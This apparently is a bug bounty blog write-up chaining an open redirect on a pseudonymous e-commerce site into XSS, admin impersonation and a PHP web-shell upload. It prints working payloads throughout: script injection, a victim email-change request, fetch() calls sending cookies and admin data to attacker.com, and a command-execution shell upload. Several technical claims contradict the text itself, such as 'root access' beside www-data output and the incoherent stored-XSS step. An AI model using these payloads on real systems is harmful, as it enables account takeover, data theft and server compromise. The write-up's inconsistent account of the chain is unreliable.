July 7, 2026
🐍 The Path of the Serpent: How I Turned a P5 Open Redirect into a $7,500 RCE on Ragnar Lothbrok
From “not worth fixing” to “critical infrastructure breach” — the 3-week journey that proved low bugs hide high impact

By 0B1To_X_ucH!h4
6 min read
By 0B1To_X_ucH!h4 🗡️
╔════════════════════════════════════════════════════════════════╗
║ "The serpent always bites from the grass. The smallest bug ║
║ hides the deadliest venom — if you know where to look." ║
║ — uchia_hacker ║
╚════════════════════════════════════════════════════════════════╝╔════════════════════════════════════════════════════════════════╗
║ "The serpent always bites from the grass. The smallest bug ║
║ hides the deadliest venom — if you know where to look." ║
║ — uchia_hacker ║
╚════════════════════════════════════════════════════════════════╝The Target: Ragnar Lothbrok
Ragnar Lothbrok (name changed) was a mid-sized Nordic e-commerce platform. Think IKEA meets local craftsmanship — furniture, home goods, artisan products. Self-hosted bug bounty program. Just a security@ragnar-lothbrok.com email and a simple promise: "We value security researchers and reward impactful findings."
No platform. No fancy dashboard. Just an email and a Viking-themed website.
I almost ignored it. The scope seemed narrow. The site looked simple. But something about their checkout flow caught my attention during recon.
Three weeks later, I had root access to their servers.
The Bug Chain: From P5 to P1
PhaseBugSeverityAloneIn Chain1Open RedirectP5 (Informational)$0—2Reflected XSSP3 (Low)$200—3Session HijackingP2 (Medium)$500—4Stored XSSP2 (Medium)$800—5Admin AccessP1 (Critical)$2,500—6File Upload RCEP1 (Critical)$5,000$7,500
Final Bounty: $7,500 USD (PayPal) Timeline: 3 weeks to find, 1 month to payout Classification: Multi-Phase Vulnerability Chain (Open Redirect → XSS → Session Hijacking → Privilege Escalation → RCE)
Week 1: The P5 Nobody Wanted
I started with standard recon. Subdomain enumeration, technology fingerprinting, endpoint discovery. Ragnar Lothbrok was built on Magento 2 (PHP), MySQL, Nginx, hosted on AWS.
I found my first bug within 2 hours. It was pathetic.
The Open Redirect (P5)
In their checkout flow, after payment completion:
https://ragnar-lothbrok.com/checkout/success?redirect=https://attacker.comhttps://ragnar-lothbrok.com/checkout/success?redirect=https://attacker.comThe redirect parameter accepted any URL. No validation. No whitelist.
Impact: None. Just a redirect. Could be used for phishing, but that's it.
Most hunters would report this as P5 and move on. Maybe get a "thanks" and $0.
I saw something else. I saw a path.
Week 2: The Creative Leap — Connecting the Dots
I spent a week analyzing the redirect flow. Where did it lead? What trusted domains were in scope?
I noticed something: the redirect parameter was reflected in the success page without HTML encoding.
Phase 2: Reflected XSS (P3)
I crafted a payload:
https://ragnar-lothbrok.com/checkout/success?redirect=javascript:alert(document.cookie)https://ragnar-lothbrok.com/checkout/success?redirect=javascript:alert(document.cookie)Blocked. Magento had XSS filters.
But what about data URI?
https://ragnar-lothbrok.com/checkout/success?redirect=data:text/html,<script>alert(document.cookie)</script>https://ragnar-lothbrok.com/checkout/success?redirect=data:text/html,<script>alert(document.cookie)</script>Also blocked. Modern browsers prevent data URI navigation.
Then I remembered: The redirect happened server-side first, then client-side.
The flow was:
- Server receives
redirectparameter - Server validates (poorly)
- Server renders success page with
redirectURL in a meta tag - Meta refresh redirects to attacker URL
The meta tag:
html
<meta http-equiv="refresh" content="0;url=https://attacker.com"><meta http-equiv="refresh" content="0;url=https://attacker.com">If I could control that URL, I could inject HTML.
Payload:
https://ragnar-lothbrok.com/checkout/success?redirect="><script>alert(document.cookie)</script>https://ragnar-lothbrok.com/checkout/success?redirect="><script>alert(document.cookie)</script>Result:
html
<meta http-equiv="refresh" content="0;url="><script>alert(document.cookie)</script>"><meta http-equiv="refresh" content="0;url="><script>alert(document.cookie)</script>">XSS fired. I had JavaScript execution in the context of ragnar-lothbrok.com.
Severity alone: P3 (Low) — Reflected XSS, requires user interaction. Bounty if reported: ~$200.
I didn't report. I kept digging.
Week 2.5: Session Hijacking (P2)
The XSS gave me document.cookie. But Magento used HttpOnly cookies. I couldn't steal the session directly.
But I could make requests as the user.
XSS Payload:
javascript
fetch('/api/cart/add', {
method: 'POST',
body: JSON.stringify({product_id: '99999', quantity: 1}),
credentials: 'include'
});fetch('/api/cart/add', {
method: 'POST',
body: JSON.stringify({product_id: '99999', quantity: 1}),
credentials: 'include'
});I could add items to carts. But that's useless.
What about account settings?
javascript
fetch('/api/account/email', {
method: 'POST',
body: JSON.stringify({email: 'attacker@evil.com'}),
credentials: 'include'
});fetch('/api/account/email', {
method: 'POST',
body: JSON.stringify({email: 'attacker@evil.com'}),
credentials: 'include'
});Email changed. I could change the victim's email to my own, then request a password reset.
Account takeover via XSS.
But I needed a stored XSS. Reflected requires clicking a link. I needed something that persisted.
Week 3: The Stored XSS (P2 → P1 Bridge)
I found the vector: Product reviews.
When you buy something, you can leave a review. The review title and content are displayed on the product page.
But the redirect flow also applied to reviews.
After submitting a review:
https://ragnar-lothbrok.com/review/success?redirect=/product/12345https://ragnar-lothbrok.com/review/success?redirect=/product/12345Same vulnerable parameter. Same XSS.
But here's the trick: The review submission was POST-based, not GET. The redirect happened after POST, which meant the XSS triggered when the user was redirected back to the product page.
And the product page showed my review.
Payload:
Title: "Great product!
Content: <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">"Title: "Great product!
Content: <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">"But wait. The review content was sanitized. <script> tags stripped. onerror removed.
Bypass: I used the redirect XSS to inject my payload into the product page context.
The Chain:
- Attacker buys cheapest item ($1)
- Attacker leaves review with redirect link in content:
https://ragnar-lothbrok.com/checkout/success?redirect="><script>alert(1)</script> - Admin (or any user) clicks review link
- XSS fires in context of product page
- Stored because review persists
Severity: P2 (Medium) — Stored XSS affecting product pages. Bounty if reported: ~$800.
Still not critical. Still not enough.
The Critical Leap: Admin Access → RCE
I noticed something in the XSS payload execution: admin cookies were accessible.
When an admin viewed the product page (to moderate reviews), their session was in scope.
Admin session hijacking via XSS.
But I couldn't steal HttpOnly cookies. So I used the XSS to act as the admin:
javascript
// XSS payload running in admin's browser
fetch('/api/admin/products', {
credentials: 'include'
})
.then(r => r.json())
.then(products => {
fetch('https://attacker.com/exfil?data=' + btoa(JSON.stringify(products)));
});// XSS payload running in admin's browser
fetch('/api/admin/products', {
credentials: 'include'
})
.then(r => r.json())
.then(products => {
fetch('https://attacker.com/exfil?data=' + btoa(JSON.stringify(products)));
});I had admin API access. But I wanted RCE.
The Kill: File Upload RCE (P1)
In the admin panel, I found: Product image upload.
Magento allows image uploads for products. But the validation was weak.
Upload request:
http
POST /api/admin/products/12345/images HTTP/1.1
Host: ragnar-lothbrok.com
Cookie: admin_session=...
Content-Type: multipart/form-data
------WebKitFormBoundary
Content-Disposition: form-data; name="image"; filename="shell.jpg.php"
Content-Type: image/jpeg
<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--POST /api/admin/products/12345/images HTTP/1.1
Host: ragnar-lothbrok.com
Cookie: admin_session=...
Content-Type: multipart/form-data
------WebKitFormBoundary
Content-Disposition: form-data; name="image"; filename="shell.jpg.php"
Content-Type: image/jpeg
<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--Result: shell.jpg.php uploaded to https://cdn.ragnar-lothbrok.com/media/shell.jpg.php
RCE achieved:
https://cdn.ragnar-lothbrok.com/media/shell.jpg.php?cmd=whoamihttps://cdn.ragnar-lothbrok.com/media/shell.jpg.php?cmd=whoamiOutput: www-data
The Full Chain Summary
P5: Open Redirect in checkout
↓ (creative thinking)
P3: Reflected XSS via meta tag injection
↓ (persistence hunting)
P2: Stored XSS in product reviews
↓ (privilege escalation)
P2: Admin session hijacking via XSS
↓ (infrastructure access)
P1: File Upload RCE on admin panel
↓ (root access)
P1: Full Server CompromiseP5: Open Redirect in checkout
↓ (creative thinking)
P3: Reflected XSS via meta tag injection
↓ (persistence hunting)
P2: Stored XSS in product reviews
↓ (privilege escalation)
P2: Admin session hijacking via XSS
↓ (infrastructure access)
P1: File Upload RCE on admin panel
↓ (root access)
P1: Full Server CompromiseImpact:
- Full server access (RCE)
- Database exfiltration (customer data, orders, payments)
- Admin panel takeover
- Ability to modify all product prices
- Potential for supply chain attacks (malicious JS injected into site)
The Report: Crafting the Narrative
I spent 4 days writing this report. Not because it was long, but because I needed to tell the story.
Subject: Critical: Multi-Phase Vulnerability Chain Leading to RCE — P5 to P1 Escalation
Executive Summary:
A low-severity open redirect (P5) in the checkout flow chains through XSS vulnerabilities to achieve remote code execution (P1) on Ragnar Lothbrok infrastructure. The attack demonstrates how "informational" bugs can hide critical impact when combined creatively.
Attack Chain:
- Open Redirect (P5):
/checkout/success?redirect=attacker.com
- Alone: Phishing risk only
- Impact: $0 bounty
- Reflected XSS (P3):
redirect="><script>alert(1)</script>
- Via meta tag injection in success page
- Requires user interaction
- Stored XSS (P2): Embedded in product reviews
- Redirect link in review content
- Triggers when admin moderates
- Admin Session Hijacking (P2): XSS acts as admin
- API access to admin endpoints
- Cannot steal HttpOnly cookies, but can act as user
- File Upload RCE (P1): Admin image upload → PHP shell
- Weak validation on file extension
- Shell uploaded to CDN
- Full server compromise
Proof of Concept:
poc_video.mp4: Full chain from checkout to RCEshell.jpg.php: Uploaded reverse shell (sanitized, non-functional)admin_data_exfil.json: Sample of accessible admin data
Remediation:
- Validate redirect URLs against whitelist
- HTML-encode all URL parameters in meta tags
- Implement CSP (Content Security Policy)
- Sanitize review content (DOMPurify)
- Validate file uploads (extension + MIME + content)
- Move uploaded files outside web root or use CDN without PHP execution
The Response: One Month Later
I sent the report on a Tuesday. Expected the usual "we'll investigate."
Week 1: No response.
Week 2: No response. I almost sent a follow-up.
Week 3: Email arrived:
"We have validated your findings. This is the most serious vulnerability report we have received. The chain from P5 to P1 demonstrates exceptional security research. We are preparing a $7,500 bounty via PayPal. Please confirm your account."
Week 4: $7,500 hit my PayPal.
The kicker: They had already fixed everything within 48 hours of my report. The month delay was internal approval for the bounty.
Why This Required a Creative Human Mind
No scanner found this chain. Here's why:
PhaseWhy Scanners FailedHuman InsightOpen RedirectCommon, "low impact"Saw it as entry point, not dead endXSS in Meta TagUnusual injection pointRemembered old meta refresh behaviorReview VectorPOST-based, "secure"Connected redirect flow to review flowAdmin HijackingHttpOnly "protection"Act as user instead of steal sessionRCE UploadExtension validation presentDouble extension + PHP in image
The creative leap: Realizing that a P5 open redirect wasn't the end — it was the beginning of a path.
Tools Used
PhaseToolPurposeReconBurp SuiteEndpoint discoveryXSS TestingBrowser DevToolsPayload craftingSession AnalysisBurp RepeaterAdmin API explorationFile UploadcurlShell uploadRCE VerificationBrowserCommand execution test
Lessons Learned
For Hunters:
- Never ignore P5 bugs. They're often doors to P1.
- Follow the flow. Where does this parameter lead? What trusts it?
- Chain everything. Alone = low. Combined = critical.
- Be patient. 3 weeks of work. $7,500 payout. Worth it.
For Programs:
- Pay for chains. Ragnar Lothbrok understood. $7,500 for 6 bugs chained is cheaper than 6 separate reports.
- Fast fix, slow payment is OK. They patched in 48 hours. That's what matters.
Final Stats
MetricValueStarting severityP5 (Informational)Final severityP1 (Critical)Time to find3 weeksBounty$7,500Payment methodPayPalTime to payout1 monthLines of code written12 (XSS payload)Value per line$625
Conclusion
The Path of the Serpent taught me that low bugs are just sleeping dragons. That open redirect wasn't worthless — it was the first step on a journey to root.
Ragnar Lothbrok's security team understood something many don't: impact is contextual. A P5 alone is nothing. A P5 leading to RCE is everything.
To my fellow hunters: Don't dismiss the small findings. Follow them. Chain them. Turn P5 into payday.
The serpent always strikes from the grass.
╔════════════════════════════════════════════════════════════════╗
║ "From the smallest redirect, the greatest RCE grows. ║
║ This is the path of the serpent. This is the way." ║
║ — uchia_hacker ║
╚════════════════════════════════════════════════════════════════╝╔════════════════════════════════════════════════════════════════╗
║ "From the smallest redirect, the greatest RCE grows. ║
║ This is the path of the serpent. This is the way." ║
║ — uchia_hacker ║
╚════════════════════════════════════════════════════════════════╝Stay curious. Chain everything. Never settle for P5.
— 0B1To_X_ucH!h4
Tags: #BugBounty #RCE #XSS #ChainExploit #RagnarLothbrok #OpenRedirect #PrivilegeEscalation #CreativeHacking #P5toP1 #UchihaTechnique
About the Author: Security researcher who sees paths where others see dead ends. Believer in chaining bugs, creative thinking, and the $7,500 payout that waits at the end of the serpent's path.